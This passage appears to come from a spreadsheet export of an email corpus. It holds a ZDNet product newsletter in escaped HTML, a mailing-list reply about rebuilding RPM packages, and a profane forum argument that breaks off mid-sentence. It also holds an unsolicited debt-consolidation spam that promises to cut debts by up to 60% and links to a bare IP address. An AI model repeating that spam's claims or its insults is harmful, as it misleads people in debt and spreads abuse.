 &lt;/table&gt;&lt;!-- top 5 --&gt;&lt;IMG 
       height=18 alt="ZDNet Top 5 Products" src="http://www.cnet.com/i/sh/nl/top5.gif" 
       width=160&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=2 cellPadding=0 width=160 bgColor=#eeeeee border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&lt;!--&lt;IMG height=3 src="http://www.cnet.com/i/sh/nl/b.gif" 
             width=1&gt;&lt;BR&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&amp;nbsp; &lt;IMG alt="" 
             src="e50520011112_files/rhc_digitalcameras.gif" border=0&gt;--&gt; &lt;b&gt;&lt;FONT face="arial, helvetica" size=-1&gt;Handhelds&lt;/font&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=15&gt;&lt;FONT face="arial, helvetica" 
           size=-1&gt;&lt;B&gt;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
  &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DbnuOEmKns2asfI8UkRR" &gt;&lt;B&gt;Toshiba Pocket PC e310&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJ4ksBdkSjaeTldfVpf4R" &gt;CDW $399&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_AUUILs0dAVJ9PZAKTrR" &gt;&lt;B&gt;Palm m515&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier 
             merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJrcJ9-e_adxQMKtNX8PQiR" &gt;buy.com $445&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaAxcMAYQzSROUJEymxqPR" &gt;&lt;B&gt;Handspring Treo 90&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq24o999EbjsMVKpv3DxnR" &gt;buy.com $649&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkH9ZV11NbqBxDVAmoBameR" &gt;&lt;B&gt;Toshiba Pocket PC e740&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAfWBZd798BbBL7kOi_yR" &gt;CDW $499&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXweSzdmiKMZ2Fz8IR7XlR" &gt;&lt;B&gt;Compaq iPaq H3835&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89M37PpTktQ3DlPfP8N4R" &gt;Dell $1,467&lt;/A&gt; &lt;BR&gt;--&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW87wllp9Z5VKc-3P0BcR" &gt;More Top 
             Selling Products...&lt;/A&gt;&lt;/B&gt;&lt;/B&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD vAlign=bottom width=12 colSpan=3&gt;&lt;IMG height=6 
       src="http://www.cnet.com/i/sh/nl/gl_corner2.gif" width=12&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- intro --&gt;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width=428 bgColor=#ffffff&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=428 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=0 width=410 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=top&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333 
                   size=2&gt;&lt;B&gt;Dear Reader,&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 Personal lasers come in shapes, sizes, and prices to suit almost 
 any user. A low-end desktop laser printer can cost as little as 
 $199 or as much as $500, but most hover around $300 and strike a 
 good balance between speed, quality, and features. The less expensive 
 models will suit students or home users who need to print letters 
 or homework assignments, as well as perform other simple tasks. 
 In pricier models, vendors typically add more RAM, higher-capacity 
 paper trays, duplexing capabilities, and networking options for 
 corporate and small-business users. 
 &lt;p&gt;
 Check out a few of our favorites below and find the laser printer
 with the right price and features for you!
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEntHtnwsNSlpW-B_KMqztFR" &gt;Brother HL-1440&lt;/a&gt; 
 &lt;li&gt;Lowest price: $249
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_DZdeGRQA5K-fxuEL59R" &gt;HP LaserJet 1200&lt;/a&gt; 
 &lt;li&gt;Lowest price: $319
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71Z1RjzUtuoAABMMPZ9rR" &gt;Lexmark E320&lt;/a&gt; 
 &lt;li&gt;Lowest price: $230
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za68Vn7dcCW5CH7esbKRiR" &gt;Samsung ML-1450&lt;/a&gt; 
 &lt;li&gt;Lowest price: $231
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSIlz-NZQhaIHsSzky0PR" &gt;Xerox Phaser 3400&lt;/a&gt; 
 &lt;li&gt;Lowest price: $627
 &lt;br&gt;&lt;br&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
         width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- new products--&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=30 alt="Feature: New Products" 
             src="http://www.cnet.com/i/sh/nl/sub_new.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRUtBmysgVnxXFZcIuInR" &gt;&lt;IMG height=100 src="http://www.zdnet.com/products/graphics/pid/561185.jpg" width=130 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDUxdk7iRmBekeVktk2eR" &gt;&lt;B&gt;Minolta Dimage F100&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;Friendly to digital novices and enthusiasts alike, the Minolta
 Dimage F100 combines innovative automatic technology and advanced
 manual controls in a very portable package.&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRkWsZ6lxv3orMjEsaQPR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8ckIVl81_XGuwrfzJ6nnR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XroDcz4bFIz4s1RhjGRseR" &gt;&lt;IMG height=100 hspace=10 src="http://www.zdnet.com/products/graphics/pid/560624.jpg" width=130 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRhIa2b2c-r7MBvWpjuyR" &gt;&lt;B&gt;NEC-Mitsubishi MultiSync LCD1550V flat panel&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;This thin monitor is one of the best values in its price class; it's sleek, compact, and stylish, with very good performance.&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeK3-LmUU5CfCkxHB0FFR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvkWaBuOrctPQDwwaMC9R" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ad --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=395 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=385 bgColor=#c0c0c0&gt;&lt;IMG height=1 
             src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT 
       face="arial, helvetica" size=-1&gt;&lt;BR&gt;&lt;/FONT&gt;
       &lt;CENTER&gt;&lt;IMG height=10 alt=Advertisement 
       src="http://www.cnet.com/i/sh/nl/ad10-dk.gif" width=120&gt;&lt;/CENTER&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/8474systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcO-n9O5O80ywQ-4d0P6cR" &gt;$50K-a-day Giveaway from Dell Home Systems&amp;#8230;&lt;/A&gt;&lt;br&gt;Buy any new Dell Home System on or before July 31, 2002 and you'll
 be automatically entered to win $50,000. The next lucky winner
 could be you!&lt;br&gt;&lt;/td&gt;
   &lt;!--&lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/8474systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8sJaujppqfRO9R6BpKlR" &gt;$50K-a-day Giveaway from Dell Home Systems&amp;#8230;&lt;/A&gt;&lt;br&gt;Buy any new Dell Home System on or before July 31, 2002 and you'll be automatically entered to win $50,000. The next lucky winner could be you!&lt;br&gt;&lt;/td&gt; 		  
 &lt;tr valign=middle&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=75 align=right&gt;&lt;img src="http://www.cnet.com/i/sh/nl/hp_inks2.jpg" width="98" height="82" border="0" hspace="20" align="bottom" alt=""&gt;&lt;/td&gt;
 &lt;td width=300 height="50" valign="top"&gt;&lt;font face="verdana, helvetica" size="-2"&gt;&lt;BR&gt;
 Canon inkjet cartridges start at $2.00!&lt;BR&gt;
 Epson inkjet cartridges start at $4.00!&lt;BR&gt;
 HP inkjet cartridges start at $15.00!&lt;BR&gt;
 Toners start at just $17.00!&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduI92nk8RjZWSoS2P4Jm4R" &gt;http://www.voltexx.com&lt;/a&gt;
 &lt;/FONT&gt;&lt;/TD&gt;--&gt;&lt;/TR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- steals and deals --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;IMG height=30 alt="Steals and Deals" 
             src="http://www.cnet.com/i/sh/nl/sub_steals.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT size=-2&gt;Please note 
             that prices fluctuate and may have changed since the sending of this 
             newsletter. Lowest prices listed are usually after rebates (but 
             please check with the reseller, sometimes the rebate is included in 
             their price). &lt;BR&gt;&lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;Sony DVP-NS900V&lt;/B&gt;&lt;BR&gt;Price recently dropped 24%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdintIeCuXydit0M-0OvrR" &gt;
 			Lowest price: $610&lt;/A&gt; 
             &lt;P&gt;&lt;B&gt;Creative Labs Nomad Jukebox 6GB&lt;/B&gt;&lt;BR&gt;Price recently dropped 31%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dwerXk641H99K8FZuSiR" &gt;
 			Lowest price: $150&lt;/A&gt;&lt;BR&gt;
             &lt;P&gt;&lt;B&gt;Monitor Dell P992 19 inch (17.9 VIS) Gray&lt;/B&gt;&lt;BR&gt;Price recently dropped 12%&lt;br&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1G9q6b2NHCu4jNix1DPPR" &gt;
 			Lowest price: $379&lt;font face="Arial"&gt;&lt;/A&gt; &lt;BR&gt;&lt;br&gt;
 			&lt;BR&gt;&lt;BR&gt;&lt;U&gt;&lt;B&gt;SPECIAL FEATURE&lt;/B&gt;&lt;/U&gt;&lt;BR&gt;&lt;br&gt;Did you know that CNET ChannelOnline enables your sales team to 
 view pricing and product availability in real time?
 &lt;P&gt;
 ChannelOnline's Quote &amp; Procure displays up-to-the-minute pricing 
 and availability from multiple distributors - so you can get your
 customers what they need, when they need it.
 &lt;P&gt;
 You'll be able to:
 &lt;li&gt;View data from your select distributors
 &lt;li&gt;Compare negotiated pricing for all your distributors
 &lt;li&gt;Determine which SKUs are available at your suppliers' warehouses
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4X0baQH1AwQ4lAUw-5WnR" &gt;&lt;B&gt;Tell me more about Quote &amp; Procure&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;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width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- Thin grey line --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=582 bgColor=#ffffff&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;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width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=564 bgColor=#ffffff&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;BR&gt;
 &lt;!--Elsewhere --&gt;
       &lt;FONT face="arial, helvetica" color=#990000 size=+1&gt;&lt;B&gt;Elsewhere on ZDNet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1 src="http://www.zdnet.com/b.gif" 
             width=1 NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;IMG height=4 src="http://www.zdnet.com/b.gif" width=1 
             NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4mnlO6wRZxrhBm0WHtheR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zG3JjyFy8ZvQIzTKtR1yR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAhzzzneOeNyGEI9rCM8vlR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSOWOp47Hcoh57BymNzeR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA7jaL4p40O9U4lR0vdksR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;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
 &lt;!-- footer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href="http://clickthru.online.com/Click?q=69-CY-iIoWgaIrV_QlMoAH4OpRzLxFR" &gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;p&gt;
 &lt;a NOTRACK href='http://clickthru.online.com/Click?q=7e-XDMezipN37q7T_C8ixC7stkhZeXfesRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ30GS0BjcTYjvQ8Rgn5rR" &gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkrZPXLHCDtZs6swzdONiR" &gt;Change e-mail address&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5mGYJMjpAEVgnfqGsJPR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULw1D-jAlU3Gl22vbAOyenR" &gt;Advertise&lt;/a&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=e8-DOJMQfk8U_OEeaFrAP_kMFIM55iR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1lnnyl_O_Iti64Q9t8PR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYluXcGl-pEvKY-qkCKnR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2GRsnMcFSkMRUVolYrBeR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1GhZN21Y0VXXjhrHNHyR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxgt2HKBJlh9GpMUHM3FR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqnCVO-cWhKPAKa1CPIuR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWccNNhZUpfLHDx1984BOsR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyN_oUSVRMzb-Byo4hJdlR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e505&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=a6-9zV4-wUELIfQRC0x5xDN07bNwRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Debt Consolidation
</t>
  </si>
  <si>
    <t xml:space="preserve">Tired of Mounting Credit Card Debt?
 Frustrated by Creditor Harrassment?
 Bogged down by Medical Expenses?
 Just Plain Tired of the Financial Insanity?
 By filling out the simple form below you can,
 Reduce your debts by up to 60%!
 Reduce or Eliminate Interest!
 Preserve or Rebuild your Credit
 Stop the Harrassing Phone Calls!
 Follow the link below to fill out the short and easy form today!!
 http://61.129.68.19/user0205/index.asp?Afft=DP09
 It's a free quote and only take a couple of seconds!!
 Please know that we do not want to send you information regarding our special offers if you do not wish to receive it.  
 If you would no longer like us to contact you or feel that you have received this email in error, please follow the link below
 to unsubscribe.
 http://61.129.68.19/light/watch.asp
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 04 Oct 2002 03:25:30 +0200
 Vincent &lt;cult@free.fr&gt; wrote:
 # If I get troubles with the .tar.gz source file compilation, will it
 # work with the .src.rpm source file compilation ?
 # If it will, how do I manage with a .src.rpm file, sorry, I don't
 # remeber :(
 The .src.rpm will prompt you for what packages you need to complete
 the compile.
 rpmbuild --rebuild --target=$arch file.src.rpm
 -- 
 Jesse Keating
 j2Solutions.net
 Mondo DevTeam (www.mondorescue.org)
 Was I helpful?  Let others know:
  http://svcs.affero.net/rm.php?r=jkeating
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re[2]: A moment of silence for the First Amendment (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;
 &gt;&gt;Wishful thinking. People are just bigger dickheads now. Culture is changing
 &gt;&gt;and it is becoming acceptable to get in peoples face and shout them down
 &gt;&gt;when you disagree with them.  The people that do this are NOT
 &gt;&gt;disenfranchised. They
 &gt;&gt;get their rocks off on being disagreeable assholes. The act of protesting is
 &gt;&gt;more important than the actual issue being protested for most of these
 &gt;&gt;people.
 &gt;&gt;  
 &gt;&gt;
 OB&gt; In my experience, this is classic "American" behaviour, and I don't 
 OB&gt; think its on the increase outside of the US of A.
 OB&gt; I am willing to accept the premise that Americans are bigger dickheads 
 OB&gt; then they used to be.
 *sighs*
 Right.  Because Americans are the only people capable of being
 assholes.  Shit.  History keeps fucking up when they keep mentioning
